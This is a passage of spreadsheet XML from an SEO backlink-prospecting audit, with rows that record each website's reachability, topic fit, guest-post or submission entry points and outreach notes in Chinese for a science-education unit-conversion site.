        <x:v>At Bilingual Beginnings, you can find bilingual parenting tips, free resources in Spanish for kids, and play-based children's activities. Home - Bilingual Beginnings Skip to Content Search Search for: Close Search &amp;times; Home Bilingual Parenting Bilingual Parenting Methods Picture Books in Spanish Let’s Learn Spanish Free Spanish Printables Free Printable Library Shop Spring Are you raising, or planning to raise, bilingual children? That&amp;rsquo;s fantastic! You&amp;rsquo;re giving your child an incredible gift that will benefit them for a lifetime. If you&amp;rsquo;re just starting your bilingual journey, it&amp;rsquo;s important to choose a family language plan that fits your needs! Check out the four more-studied family language plans below: Minority Language At Home This approach is ideal for two parents or caretakers who both speak th</x:v>
      </x:c>
      <x:c r="R419" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S419" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T419" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://lorenaylennox.com</x:v>
      </x:c>
    </x:row>
    <x:row r="420">
      <x:c r="A420" s="18" t="str">
        <x:v>419</x:v>
      </x:c>
      <x:c r="B420" s="19" t="str">
        <x:v>freubelweb.nl</x:v>
      </x:c>
      <x:c r="C420" s="19" t="str">
        <x:v>https://freubelweb.nl</x:v>
      </x:c>
      <x:c r="D420" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E420" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F420" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G420" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H420" s="19" t="str">
        <x:v>http://freubelweb.nl/</x:v>
      </x:c>
      <x:c r="I420" s="19" t="str"/>
      <x:c r="J420" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K420" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L420" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M420" s="19" t="str">
        <x:v>http://freubelweb.nl/</x:v>
      </x:c>
      <x:c r="N420" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O420" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P420" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q420" s="21" t="str">
        <x:v>Apache is functioning normally</x:v>
      </x:c>
      <x:c r="R420" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S420" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T420" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://freubelweb.nl
http://freubelweb.nl</x:v>
      </x:c>
    </x:row>
    <x:row r="421">
      <x:c r="A421" s="18" t="str">
        <x:v>420</x:v>
      </x:c>
      <x:c r="B421" s="19" t="str">
        <x:v>starcourts.com</x:v>
      </x:c>
      <x:c r="C421" s="19" t="str">
        <x:v>https://starcourts.com</x:v>
      </x:c>
      <x:c r="D421" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E421" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F421" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G421" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H421" s="19" t="str">
        <x:v>https://starcourts.com/</x:v>
      </x:c>
      <x:c r="I421" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J421" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K421" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L421" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M421" s="19" t="str">
        <x:v>https://starcourts.com/</x:v>
      </x:c>
      <x:c r="N421" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O421" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P421" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q421" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R421" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S421" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T421" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://starcourts.com</x:v>
      </x:c>
    </x:row>
    <x:row r="422">
      <x:c r="A422" s="18" t="str">
        <x:v>421</x:v>
      </x:c>
      <x:c r="B422" s="19" t="str">
        <x:v>pchome.com.tw</x:v>
      </x:c>
      <x:c r="C422" s="19" t="str">
        <x:v>https://pchome.com.tw</x:v>
      </x:c>
      <x:c r="D422" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E422" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F422" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G422" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H422" s="19" t="str">
        <x:v>https://www.pchome.com.tw/</x:v>
      </x:c>
      <x:c r="I422" s="19" t="str">
        <x:v>PChome Online 首頁</x:v>
      </x:c>
      <x:c r="J422" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K422" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L422" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M422" s="19" t="str">
        <x:v>https://www.pchome.com.tw/</x:v>
      </x:c>
      <x:c r="N422" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O422" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P422" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q422" s="21" t="str">
        <x:v>PChome網路家庭(8044-tw)提供全集團網路服務整合入口，包含PChome24h購物、露天市集、股市、即時新聞、星座運勢農民曆、買車、個人新聞台、SSL憑證、買網址、線上投保、日本代購、福委採購等服務。 PChome Online 首頁 24h購物 書店 露天市集 全球購物 媽咪愛 新聞 股市 個人新聞台 發票樂透開獎 時事專題 星座運勢 新聞輿情 PChome聯名卡 易安網保經 支付連 Pi 拍錢包 旅遊 福委企業採購 買車 熱門Youtuber 醫療科技 產業趨勢 線上麻將 雜誌 會員中心 顧客中心 一元簡訊 直播達人 數位憑證 企業簡訊 買網址 虛擬主機 企業郵件 隱私權聲明 消費者保護 兒童網路安全 About PChome 投資人聯絡 著作權保護 ESG企業永續 更多 最新新聞 股 市 大盤 新 聞 除權息 農民曆 吉時 旅行玩樂 進榜書 買車 星座運勢 好日子 法說會 線上麻將 個人新聞台 揪愛公益 24h購物 7-11隨行取 書店 露天市集 樂屋網 24h保險 分期趣 Pi拍錢包 買網址 數位憑證 顧客中心 人才招募 投資人專區 關於我們 新聞 文章 搜尋 新聞 文章 # Claude # Anthropic # 冰箱怎麼選 # 鬼月禁忌 # 好日子查詢 GIGABYTE技嘉電競筆電推薦！5台熱門16吋NB，入門到進階顯卡 RTX 4050、5060、5070一次挑 現在的筆電不只拿來處理文書工作，玩遊戲、剪影片、修圖，甚至使用AI工具，都會需要一定的效能支援。對於平常有多元使用需求的人來說，選擇一台效能更充足的電競筆電，不只能應付遊戲，也能兼顧工作、創作 貓咪不愛睡床偏愛「睡地板」？看懂環境影響為牠打造最舒服的窩！ 火報記者 張舜傑／報導 買了柔軟又漂亮的貓床，貓咪卻完全不領情？其實貓咪挑選休息位置時，看的不只有柔軟度，室內溫度、材質觸感、周遭環境與安全感，都可</x:v>
      </x:c>
      <x:c r="R422" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S422" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T422" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://pchome.com.tw</x:v>
      </x:c>
    </x:row>
    <x:row r="423">
      <x:c r="A423" s="18" t="str">
        <x:v>422</x:v>
      </x:c>
      <x:c r="B423" s="19" t="str">
        <x:v>schnorro.de</x:v>
      </x:c>
      <x:c r="C423" s="19" t="str">
        <x:v>https://schnorro.de</x:v>
      </x:c>
      <x:c r="D423" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E423" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F423" s="20"/>
      <x:c r="G423" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H423" s="19" t="str"/>
      <x:c r="I423" s="19" t="str"/>
      <x:c r="J423" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K423" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L423" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M423" s="19" t="str">
        <x:v>https://schnorro.de</x:v>
      </x:c>
      <x:c r="N423" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O423" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P423" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q423" s="21" t="str"/>
      <x:c r="R423" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S423" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T423" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://schnorro.de
http://schnorro.de</x:v>
      </x:c>
    </x:row>
    <x:row r="424">
      <x:c r="A424" s="18" t="str">
        <x:v>423</x:v>
      </x:c>
      <x:c r="B424" s="19" t="str">
        <x:v>adrilikes.com</x:v>
      </x:c>
      <x:c r="C424" s="19" t="str">
        <x:v>https://adrilikes.com</x:v>
      </x:c>
      <x:c r="D424" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E424" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F424" s="20"/>
      <x:c r="G424" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H424" s="19" t="str"/>
      <x:c r="I424" s="19" t="str"/>
      <x:c r="J424" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K424" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L424" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M424" s="19" t="str">
        <x:v>https://adrilikes.com</x:v>
      </x:c>
      <x:c r="N424" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O424" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P424" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q424" s="21" t="str"/>
      <x:c r="R424" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S424" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T424" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://adrilikes.com
http://adrilikes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="425">
      <x:c r="A425" s="18" t="str">
        <x:v>424</x:v>
      </x:c>
      <x:c r="B425" s="19" t="str">
        <x:v>astorapiaries.com</x:v>
      </x:c>
      <x:c r="C425" s="19" t="str">
        <x:v>https://astorapiaries.com</x:v>
      </x:c>
      <x:c r="D425" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E425" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F425" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G425" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H425" s="19" t="str">
        <x:v>https://astorapiaries.com/</x:v>
      </x:c>
      <x:c r="I425" s="19" t="str">
        <x:v>Astor Apiaries - Urban Beekeeping &amp; Honey in NYC</x:v>
      </x:c>
      <x:c r="J425" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K425" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L425" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M425" s="19" t="str">
        <x:v>https://astorapiaries.com/</x:v>
      </x:c>
      <x:c r="N425" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O425" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P425" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q425" s="21" t="str">
        <x:v>Astor Apiaries is an urban bee farm and shop based in Queens, NY. We care for hives across the city, offer classes about bees and produce exceptional NYC Raw Honey. Astor Apiaries - Urban Beekeeping &amp; Honey in NYC Skip to content Submit Close search Submit Search Log in Cart Home Shop Shop Menu Shop Honey Honey &amp; Gifts Candles Gift Cards Full Catalog Beekeeping Beekeeping Menu Beekeeping Live Bees Tools Gear Hive Equipment Pest Management Services Services Menu Services Hive Tours Urban Beekeeping Academy Observation Hives House Calls Classes, Workshops, &amp; more Event Space Rental Blog Blog Menu Blog The NYC Beekeeper Recipes Press Events Home Shop Honey Honey &amp; Gifts Candles Gift Cards Full Catalog Beekeeping Live Bees Tools Gear Hive Equipment Pest Management Services Hive Tours Urban Beekeeping Academy Observation Hives House Calls Classes, Workshops,</x:v>
      </x:c>
      <x:c r="R425" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S425" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T425" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://astorapiaries.com</x:v>
      </x:c>
    </x:row>
    <x:row r="426">
      <x:c r="A426" s="18" t="str">
        <x:v>425</x:v>
      </x:c>
      <x:c r="B426" s="19" t="str">
        <x:v>hessunacademy.com</x:v>
      </x:c>
      <x:c r="C426" s="19" t="str">
        <x:v>https://hessunacademy.com</x:v>
      </x:c>
      <x:c r="D426" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E426" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F426" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G426" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H426" s="19" t="str">
        <x:v>https://hessunacademy.com/</x:v>
      </x:c>
      <x:c r="I426" s="19" t="str">
        <x:v>Hess Un-Academy - Homeschool Tips + Kid Success Principles</x:v>
      </x:c>
      <x:c r="J426" s="19" t="str">
        <x:v>Homeschool 教育博客</x:v>
      </x:c>
      <x:c r="K426" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L426" s="19" t="str">
        <x:v>写作咨询入口</x:v>
      </x:c>
      <x:c r="M426" s="19" t="str">
        <x:v>https://hessunacademy.com/contact-us/</x:v>
      </x:c>
      <x:c r="N426" s="19" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="O426" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P426" s="21" t="str">
        <x:v>当前联系页明确提供 write-for-us 咨询入口，但合作具有选择性，未承诺固定 backlink。</x:v>
      </x:c>
      <x:c r="Q426" s="21" t="str">
        <x:v>Hess Un-Academy is my go-to place for homeschool tips and success principles for kids! The field trip curriculums are lots of fun. Homeschool encouragement at its best. Hess Un-Academy - Homeschool Tips + Kid Success Principles Skip to Content Search Search for: Close Search &amp;times; Homeschool Help All Things Homeschool How to Homeschool for Beginners Homeschool Curriculum Tips 450+ Free Printable Worksheets for Kids Field Trips Subjects Character Life Hack Training Series Success Principles for Kids Geography History Math Reading Spirituality and Faith STEAM/STEM The Arts Holidays Halloween Thanksgiving Christmas New Year’s Valentine’s Day Easter Summertime Independence Day All Holidays Gift Guides Reviews Bark Homeschool+ KiwiCo Panda Crate Noggin PureFlix Qustodio VidAngel Shop Art &amp; Crafts Subjects Bingo &amp; Board Games Learning Activities &amp; Games Bundles</x:v>
      </x:c>
      <x:c r="R426" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S426" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T426" s="21" t="str">
        <x:v>先发选题和大纲，不要发链接插入请求。 | 请求: https://hessunacademy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="427">
      <x:c r="A427" s="18" t="str">
        <x:v>426</x:v>
      </x:c>
      <x:c r="B427" s="19" t="str">
        <x:v>csculture.com</x:v>
      </x:c>
      <x:c r="C427" s="19" t="str">
        <x:v>https://csculture.com</x:v>
      </x:c>
      <x:c r="D427" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E427" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F427" s="20"/>
      <x:c r="G427" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H427" s="19" t="str"/>
      <x:c r="I427" s="19" t="str"/>
      <x:c r="J427" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K427" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L427" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M427" s="19" t="str">
        <x:v>https://csculture.com</x:v>
      </x:c>
      <x:c r="N427" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O427" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P427" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q427" s="21" t="str"/>
      <x:c r="R427" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S427" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T427" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://csculture.com
http://csculture.com</x:v>
      </x:c>
    </x:row>
    <x:row r="428">
      <x:c r="A428" s="18" t="str">
        <x:v>427</x:v>
      </x:c>
      <x:c r="B428" s="19" t="str">
        <x:v>ideaaschool.com</x:v>
      </x:c>
      <x:c r="C428" s="19" t="str">
        <x:v>https://ideaaschool.com</x:v>
      </x:c>
      <x:c r="D428" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E428" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F428" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G428" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H428" s="19" t="str">
        <x:v>https://www.ideaaschool.com/</x:v>
      </x:c>
      <x:c r="I428" s="19" t="str">
        <x:v>IDEA SCHOOL - Get the Best Inspiring Ideas</x:v>
      </x:c>
      <x:c r="J428" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K428" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L428" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M428" s="19" t="str">
        <x:v>https://www.ideaaschool.com/</x:v>
      </x:c>
      <x:c r="N428" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O428" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P428" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q428" s="21" t="str">
        <x:v>Get the Best Inspiring Ideas IDEA SCHOOL - Get the Best Inspiring Ideas Skip to content Home Inspiring Ideas Cultural activity Inspiring Ideas Contact us Switch to dark mode Open Search Search for: Main Menu Latest How to Make a Crochet Sweater: A Beginner-Friendly Guide September 1, 2026 August 30, 2026 How to Make a Crochet Hat: A Simple Guide for Beginners September 1, 2026 August 30, 2026 How to Make a Crocheted Hair Tie: A Simple and Stylish DIY Project September 1, 2026 August 30, 2026 How to Make a Crocheted Glasses Case: A Simple and Stylish Handmade Project September 1, 2026 August 30, 2026 View More How to Make a Crochet Sweater: A Beginner-Friendly Guide Making a crochet sweater is a rewarding project that al</x:v>
      </x:c>
      <x:c r="R428" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S428" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T428" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://ideaaschool.com</x:v>
      </x:c>
    </x:row>
    <x:row r="429">
      <x:c r="A429" s="18" t="str">
        <x:v>428</x:v>
      </x:c>
      <x:c r="B429" s="19" t="str">
        <x:v>lofnt.com</x:v>
      </x:c>
      <x:c r="C429" s="19" t="str">
        <x:v>https://lofnt.com</x:v>
      </x:c>
      <x:c r="D429" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E429" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F429" s="20"/>
      <x:c r="G429" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H429" s="19" t="str"/>
      <x:c r="I429" s="19" t="str"/>
      <x:c r="J429" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K429" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L429" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M429" s="19" t="str">
        <x:v>https://lofnt.com</x:v>
      </x:c>
      <x:c r="N429" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O429" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P429" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q429" s="21" t="str"/>
      <x:c r="R429" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S429" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T429" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://lofnt.com
http://lofnt.com</x:v>
      </x:c>
    </x:row>
    <x:row r="430">
      <x:c r="A430" s="18" t="str">
        <x:v>429</x:v>
      </x:c>
      <x:c r="B430" s="19" t="str">
        <x:v>learngrowaspire.com</x:v>
      </x:c>
      <x:c r="C430" s="19" t="str">
        <x:v>https://learngrowaspire.com</x:v>
      </x:c>
      <x:c r="D430" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E430" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F430" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G430" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H430" s="19" t="str">
        <x:v>https://learngrowaspire.com/</x:v>
      </x:c>
      <x:c r="I430" s="19" t="str">
        <x:v>Learn Grow Aspire | Printable SEL &amp; Skill-Building Resources for Kids</x:v>
      </x:c>
      <x:c r="J430" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K430" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L430" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M430" s="19" t="str">
        <x:v>https://learngrowaspire.com/</x:v>
      </x:c>
      <x:c r="N430" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O430" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P430" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q430" s="21" t="str">
        <x:v>Printable SEL &amp; Skill-Building Resources for Kids Learn Grow Aspire | Printable SEL &amp; Skill-Building Resources for Kids About Privacy And Disclosure Policy Learn Grow Aspire Printable SEL &amp; Skill-Building Resources for Kids Emotions Anger Management Coping Skills Emotional Regulation Feelings &amp; Emotions Self-Esteem &amp; Confidence Social Skills Boundaries Classroom Management Resources Communication Skills Conflict Resolution Friendship Skills Respect &amp; Kindness Teens Worksheets Homeschooling Math Free Printables Free Preschool Printable Worksheets Basic Princliples Trivia Questions &amp; Answers Seasonal Spring Printables Fall Printables Summer Printables Christmas Activities Winter Printables Valentine Activities Gift Guides Goal Setting For Mid</x:v>
      </x:c>
      <x:c r="R430" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S430" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T430" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://learngrowaspire.com</x:v>
      </x:c>
    </x:row>
    <x:row r="431">
      <x:c r="A431" s="18" t="str">
        <x:v>430</x:v>
      </x:c>
      <x:c r="B431" s="19" t="str">
        <x:v>byamandakay.com</x:v>
      </x:c>
      <x:c r="C431" s="19" t="str">
        <x:v>https://byamandakay.com</x:v>
      </x:c>
      <x:c r="D431" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E431" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F431" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G431" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H431" s="19" t="str">
        <x:v>https://byamandakay.com/</x:v>
      </x:c>
      <x:c r="I431" s="19" t="str">
        <x:v>By Amanda Kay | By Amanda Kay</x:v>
      </x:c>
      <x:c r="J431" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K431" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L431" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M431" s="19" t="str">
        <x:v>https://byamandakay.com/</x:v>
      </x:c>
      <x:c r="N431" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O431" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P431" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q431" s="21" t="str">
        <x:v>Website dedicated to teaching you all about creating beautiful hand lettering, brush calligraphy, watercolor art and fun crafts. By Amanda Kay | By Amanda Kay Skip to content Trending Post : The Best FREE Procreate Calligraphy Brushes The Blog Meet Amanda Kay Work With Me Resources The Shop Hand Lettering Brush Lettering Lettering Beginners Hand Lettering Tutorials Ipad Lettering Procreate Tutorials Watercolor Watercolor Lettering Brush Pen Watercolor Bullet Journal Crafts Cricut Crafts Hand Lettering Crafts Seasonal Crafts Teaching you to create beautiful hand lettering, calligraphy and art. See all the latest I want to learn Hand Lettering I want to learn iPad Lettering I want to learn Watercolor I want to start Crafting Search Latest Blog Posts See All &gt; DIY Boho Easter Basket Bunny Name Tag DIY Laser Engraved Wate</x:v>
      </x:c>
      <x:c r="R431" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S431" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T431" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://byamandakay.com</x:v>
      </x:c>
    </x:row>
    <x:row r="432">
      <x:c r="A432" s="18" t="str">
        <x:v>431</x:v>
      </x:c>
      <x:c r="B432" s="19" t="str">
        <x:v>whblygg.com</x:v>
      </x:c>
      <x:c r="C432" s="19" t="str">
        <x:v>https://whblygg.com</x:v>
      </x:c>
      <x:c r="D432" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E432" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F432" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G432" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H432" s="19" t="str">
        <x:v>http://www.whblygg.com/</x:v>
      </x:c>
      <x:c r="I432" s="19" t="str"/>
      <x:c r="J432" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K432" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L432" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M432" s="19" t="str">
        <x:v>http://www.whblygg.com/</x:v>
      </x:c>
      <x:c r="N432" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O432" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P432" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q432" s="21" t="str">
        <x:v>Please click here if the page does not redirect automatically ...</x:v>
      </x:c>
      <x:c r="R432" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S432" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T432" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://whblygg.com
http://whblygg.com</x:v>
      </x:c>
    </x:row>
    <x:row r="433">
